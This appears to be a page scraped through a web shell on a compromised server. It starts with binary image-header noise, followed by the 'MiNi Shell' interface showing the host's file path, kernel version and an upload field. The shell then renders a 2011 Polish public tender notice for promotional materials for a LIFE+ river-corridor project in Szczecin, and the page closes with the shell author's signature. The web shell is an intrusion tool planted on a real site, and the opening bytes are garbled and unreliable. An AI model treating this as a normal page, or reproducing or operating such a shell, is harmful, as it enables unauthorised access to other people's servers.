JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111004/260549-N-2011.html

<p class="kh_header"><b>Szczecin: Opracowanie, wykonanie i dostawa materiałów reklamowych i promocyjnych w ramach projektu LIFE+ pn.: Budowa niebieskiego korytarza ekologicznego wzdłuż doliny rzeki Iny i jej dopływów</b><br>
<b>Numer ogłoszenia: 260549 - 2011; data zamieszczenia: 04.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zachodniopomorski Zarząd Melioracji i Urządzeń Wodnych w Szczecinie , Al. Papieża Jana Pawła II 42, 70-415 Szczecin, woj. zachodniopomorskie, tel. 91 440 51 00, faks 91 440 51 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie, wykonanie i dostawa materiałów reklamowych i promocyjnych w ramach projektu LIFE+ pn.: Budowa niebieskiego korytarza ekologicznego wzdłuż doliny rzeki Iny i jej dopływów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.2. Miejsce realizacji: 
1.	Miejscem dostawy będzie siedziba Zamawiającego w Szczecinie.
2.	Realizacja przedmiotu zamówienia odbędzie się transportem Wykonawcy, na jego koszt i ryzyko.
3.	Dostawa towaru winna się odbyć w dzień roboczy, w dniach od poniedziałku do piątku w godzinach 8:00 - 14:00.
1.3. Zakres przedmiotu zamówienia.
Przedmiotem zamówienia jest opracowanie, wykonanie i dostawa materiałów reklamowych i promocyjnych w ramach projektu pn. Budowa niebieskiego korytarza ekologicznego wzdłuż doliny rzeki Iny i jej dopływów dofinansowanego w ramach Instrument Finansowy LIFE+ Komponent przyroda. 
Szczegółowy wykaz materiałów reklamowych i promocyjnych określa załącznik nr 5 do SIWZ - Harmonogram realizacji zadania.
1.4. Realizacja zamówienia jest niezbędna w celu spełnienia wytycznych projektu obejmujących promocję wniosku.
1.5. Zamówienie składa się z sześciu etapów. Pierwszy etap polega na opracowaniu, wykonaniu i dostawie plakatu projektu oraz plakatu informacyjnego o konkursie fotograficznym, etap drugi polega na opracowaniu, wykonaniu i dostawie kalendarzy ściennych na rok 2012, trzeci etap polega na opracowaniu, wykonaniu i dostawie kalendarzy książkowych na rok 2012. Etap czwarty polega na opracowaniu, wykonaniu i dostawie - długopisów, ołówków, notatników, teczek konferencyjnych, teczek papierowych, pendriv-ów, smyczy, kubków, koszulek, czapek, toreb ekologicznych parasoli oraz elementów odblaskowych. Etap piąty opracowanie, wykonanie i realizacja kalendarzy (ściennych, książkowych i biurkowych) na rok 2013. Etap szósty opracowanie wykonanie i realizacja kalendarzy (ściennych, książkowych i biurkowych) na rok 2014r. 


Etap I: Opracowaniu wykonaniu i dostawie plakatu projektu oraz plakatu informacyjnego o konkursie fotograficznym
1.	Plakat projektu zawierający logo: LIFE+, NFOSiGW, ZZMiUW, RDOŚ, NATURA 2000 oraz PZW Szczecin, Gaja Szczecin, Towarzystwo Przyjaciół rzeki Iny i Gowienicy, Nadleśnictwo Choszczno, Politechnika Koszalińska, Powiaty Goleniów, Choszczno i Stargard Szczeciński, Ministerstwo Środowiska, GDOŚ (logo zgodnie z zał. nr 6 do SIWZ)
format A1 - 200 szt.,
format A2 - 200 szt.,
wydruk wysokiej jakości na papierze kredowym,
min. 135 g/m2
2.	Plakat informacyjny o konkursie fotograficznym zawierający logo: LIFE+, NFOSiGW, ZZMiUW RDOŚ (logo zgodnie z zał. nr 6 do SIWZ)
format A2, 
100 szt.,
wydruk wysokiej jakości na papierze kredowym z połyskiem,
min. 135 g/m2
W celu potwierdzenia, że oferta odpowiada wymaganiom określonym przez zamawiającego Zamawiający żąda próbek jakościowych oferowanych przedmiotów.

Etap II: Opracowanie wykonanie i dostawa kalendarzy ściennych na rok 2012z logo: LIFE+, NFOSiGW, ZZMiUW RDOŚ i NATURA 2000 (logo zgodnie z zał. nr 6 do SIWZ)
1)	kalendarze ścienny na rok 2012 (100 szt.) typ - trójdzielny format A2 lub zbliżony 
główka drukowana na papierze kredowym o gramaturze min. 135g/m2 oklejona na grubym kartonie w pełnym kolorze otwór na zawieszkę, kalendaria format min. 32x15 cm dwukolorowe, czterojęzyczne. Podkład min 35x58,5cm, druk jednokolorowy. 

W celu potwierdzenia, że oferta odpowiada wymaganiom określonym przez zamawiającego Zamawiający żąda próbek jakościowych oferowanych przedmiotów.

ETAP III Opracowanie wykonanie i dostawa kalendarzy książkowych na rok 2012 z logo: LIFE+, NFOSiGW, ZZMiUW RDOŚ i NATURA 2000 (logo zgodnie z zał. nr 6 do SIWZ)
1)	kalendarz książkowy na rok 2012 - 100 szt. Układ dzienny + 8 stron z mapami, papier chamois min. 70g, oprawa przeszywana, tłoczone logo, wciętymi registrami, oprawa z tworzywa biodegradowlanego lub naturalnego, perforowane narożniki, tłoczenie na oprawie, format B5 lub A4, indywidualizowana wklejka w pełnym kolorze.
W celu potwierdzenia, że oferta odpowiada wymaganiom określonym przez zamawiającego Zamawiający żąda próbek jakościowych oferowanych przedmiotów.

Etap IV: Opracowanie, wykonanie i dostawia materiałów promocyjnych zawierających logo: LIFE+, NFOSiGW, ZZMiUW, RDOŚ, NATURA 2000 (logo zgodnie z zał. nr 6 do SIWZ)
1.	długopisy - 300 szt. Długopis z niebieskim wkładem. Wykonany z drewna lub biodegradowalnego tworzywa. Dodatkowe elementy w kolorze błękitnym.
2.	ołówki - 300 szt. Ołówek drewniany HB lub z tworzywa biodegradowalnego, naostrzony, wyposażony w gumkę.
3.	Notatniki - 100 szt. Notes format A4, wykonany z surowców wtórnych, min 70 białych kartek. Spiralne bindowanie. W zestawie biodegradowlany długopis z niebieskim wkładem. Dodatkowe elementy w kolorze błękitnym.
4.	teczki konferencyjne - 100 szt. Teczka konferencyjna na suwak z licznymi przegródkami i kieszonkami na wizytówki. Dołączony notes min 20 kartek. Wymiary orientacyjne 36x24x1,5 cm
5.	teczka papierowa - 100 szt. Teczka papierowa A4. Wykonana z sztywnego papieru .
6.	pendrive - 300 szt. Pamięć 1 GB. Obudowa plastikowa lub metalowa
7.	kalosze - 80 szt. Kalosze damskie 40 szt. wykonane z gumy wewnątrz pokryte materiałem, okrągły czubek, bez zapięcia, wysokość obcasa 2-4 cm.. Rozmiary 38 - 15 szt.; 39 - 15 szt.; 40 - 5 szt.; 41 - 5 szt.
Kalosze męskie 40 szt., wykonane z gumy wewnątrz pokryte materiałem. Okrągły czubek, bez zapięcia. Rozmiary 41 - 5 szt.; 42 - 10 szt.; 43 - 10 szt.; 44 - 10 szt.; 45 - 5 szt. 
8.	smycze - 400 szt. Szerokość od 10 mm do 20 mm. Smycz zakończona karabińczykiem metalowym posiadająca łącznik z plastikowym. Nadruk dwustronny full color na całej smyczy inny z każdej strony.
9.	kubki - 200 szt. Pojemność 280 - 300 ml, wysokość 95 - 105 mm, średnica 70 - 90 mm, 
10.	koszulki - 100 szt. Koszulka 100% bawełna, ściągacz z dodatkiem 5% tworzywa sztucznego, krótki rękaw, unisex, gramatura nie mniejsza niż 200 g/m2 ,okrągłe wycięcie pod szyją, podwójne szwy przy rękawach i u dołu koszulki. Nadruki na koszulce muszą być trwałe i nie podlegać uszkodzeniu w wyniku wielokrotnego prania. Koszulki w następujących rozmiarach: S - 20; M - 30; L - 30; XL - 20
11.	czapeczki - 150 szt. Czapka z daszkiem. 100% bawełny, zapięcie regulowane.
12.	torb ekologicznych - 1000 szt. Torba ekologiczna wykonana z bawełny, o gramaturze 150 - 200 g/m2, kolor tkaniny błękitny z pełno kolorowym nadrukiem. Poszerzane boki i dno, wymiary: szerokość 300 - 380 mm, wysokość  280 - 330 mm, głębokość 70 - 100 mm.
13.	parasoli - 40 szt. Parasol uniwersalny, poszycie poliester lub podobne, jasna lamówka, metalowe szyny, odporny na wiatr, 2 x składana metalowa laska, plastikowy uchwyt.
14.	elementy odblaskowe dla dzieci - 200 szt. Naklejka lub brelok w kształcie ryby kolor niebieski kształt łososia lub zbliżony rozmiar min. 6 cm - 100szt., szelki (uprzęże odblaskowe) - 50 szt., opaska odblaskowa niebiesko żółta, rozmiar min 34x3 cm - 50szt.

W celu potwierdzenia, że oferta odpowiada wymaganiom określonym przez zamawiającego Zamawiający żąda próbek jakościowych oferowanych przedmiotów.

Etap V: Opracowanie wykonanie i realizacja kalendarzy na rok 2013 z logo: LIFE+, NFOSiGW, ZZMiUW RDOŚ i NATURA 2000 (logo zgodnie z zał. nr 6 do SIWZ)
1.	ścienny - 200 szt. Kalendarz planszowy 12 miesięczny (6 kartek, nadruk dwustronny) + okładka, spiralkowy. Papier kredowany min 180g/m2. Format A2 lub zbliżony. Zdjęcia dostarczone przez zamawiającego. Zamawiający nie wymaga próbek jakościowych oferowanych kalendarzy na rok 2013, ponieważ zasugeruje się oceną jakości wykonania przedmiotu zamówienia z etapu II i III. 

2.	książkowe - 200 szt. Układ dzienny, bloki terminarza szyte nićmi z wciętymi registrami, oprawa z tworzywa biodegradowlanego lub naturalnego, perforowane narożniki, tłoczenie na oprawie, format B5 lub A4, indywidualizowana wklejka w pełnym kolorze. Zamawiający nie wymaga próbek jakościowych oferowanych kalendarzy na rok 2013, ponieważ zasugeruje się oceną jakości wykonania przedmiotu zamówienia z etapu II i III. 

3.	biurkowe (podkłady)- 200 szt. Format A2, objętość min 50 kart. Papier offset 80g. W celu potwierdzenia, że oferta odpowiada wymaganiom określonym przez zamawiającego Zamawiający żąda próbek jakościowych oferowanego przedmiotu.

Etap VI: Opracowanie wykonanie i realizacja kalendarzy na rok 2014 z logo: LIFE+, NFOSiGW, ZZMiUW RDOŚ i NATURA 2000 (logo zgodnie z zał. nr 6 do SIWZ)
1.	ścienny - 200 szt. Kalendarz planszowy 12 miesięczny (6 kartek, nadruk dwustronny) + okładka, spiralkowy. Papier kredowany min 180g/m2. Format A2 lub zbliżony. Zdjęcia dostarczone przez zamawiającego.
2.	książkowy - 200 szt. Układ dzienny, bloki terminarza szyte nićmi z wciętymi registrami, oprawa z tworzywa biodegradowlanego lub naturalnego, perforowane narożniki, tłoczenie na oprawie, format B5 lub A4, indywidualizowana wklejka w pełnym kolorze.
3.	Biurkowe (podkład) - 200 szt. Format A2, objętość min 50 kart. Papier offset 80g. Kolorystyka i zdobienie zgodnie z wymaganiami projektu.
Zamawiający nie wymaga próbek jakościowych oferowanych kalendarzy na rok 2014, ponieważ zasugeruje się oceną jakości wykonania przedmiotu zamówienia z etapu II i III i V. 
Zakres opracowania oraz dodatkowe obowiązki Wykonawcy określa wzór umowy stanowiący załącznik nr 3 do niniejszego SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 39.29.52.00-8, 30.19.97.92-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w kwocie: 1.500,00 PLN 
2. Wadium należy wnieść przed upływem terminu składania ofert, tj. do dnia 
13 października 2011r., W przypadku wniesienia wadium w formie pieniężnej, za moment wniesienia wadium uznaje się moment uznania rachunku bankowego Zamawiającego.
3. Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy, tj.:
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego w PKO BP S.A. I Oddział w Szczecinie,
nr: 34 1020 4795 0000 9002 0122 0631.
z adnotacją: WADIUM - przetarg ozn. NP/II/333/151/2011
Dowód wniesienia wadium należy dołączyć do oferty.
5. W przypadku wniesienia wadium w formie innej niż pieniężna - oryginał dokumentu potwierdzającego wniesienie wadium należy zdeponować w siedzibie Zamawiającego w Szczecinie, al. Papieża Jana Pawła II 42, w kasie (pok. 20), przed upływem terminu składania ofert a kopię tego dokumentu należy załączyć do oferty.
6. Wadium wniesione w innej formie niż pieniężna musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i ust. 5 ustawy.
7. Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium zgodnie z zapisami ustawy zostanie wykluczony z prowadzonego postępowania, a jego oferta zostanie odrzucona.
8. Zamawiający dokona zwrotu lub zatrzymania wadium zgodnie z art. 46 ustawy.
UWAGA!
Stosownie do zapisów art. 46 ust. 4a ustawy Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz ofertowy wg załącznika nr 1 do SIWZ.
2.	Wypełniony we wszystkich pozycjach harmonogram realizacji zadania wg załącznika nr 5 do SIWZ, 
3.	Wykaz części zamówienia powierzonych podwykonawcom.- załącznik nr 4 do SIWZ.
4.	Dowód wniesienia wadium zgodnie z wymaganiami określonymi w rozdziale III, części V. pkt.1. WADIUM
5.	Próbki jakościowe oferowanego asortymentu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmian postanowień umowy zawartej z Wykonawcą w stosunku do treści oferty w formie aneksu do umowy w zakresie:
- zmiany terminu realizacji zamówienia przed jego upływem z przyczyn niezależnych od  Wykonawcy wskazanych przez Wykonawcę,
2.	Warunkiem w/w zmian będzie zaistnienie szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w przypadku zmiany terminu realizacji przedmiotu zamówienia przedłużające się postępowanie administracyjne
 w sprawie koniecznych uzgodnień branżowych, warunkujących zamknięcie dokumentacji projektowej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zzmiuw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachodniopomorski Zarząd Melioracji
i Urządzeń Wodnych w Szczecinie, 70-415 Szczecin, al. Papieża Jana Pawła II 42,
tel. (91) 44-05-100, faks (91) 44-05-101.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.10.2011 godzina 12:00, miejsce: ZACHODNIOPOMORSKI ZARZĄD MELIORACJI I URZADZEŃ WODNYCH W SZCZECINIE, AL. PAPIEŻA JANA PAWŁA II 42, 70-415 SZCZECIN w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane jest ze środków Instrumentu Finansowego LIFE+ Komisji Europejskiej, Komponent I: Przyroda i różnorodność biologiczna w ramach zadania pod nazwą: Budowa niebieskiego korytarza ekologicznego wzdłuż doliny rzeki Iny i jej dopływów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com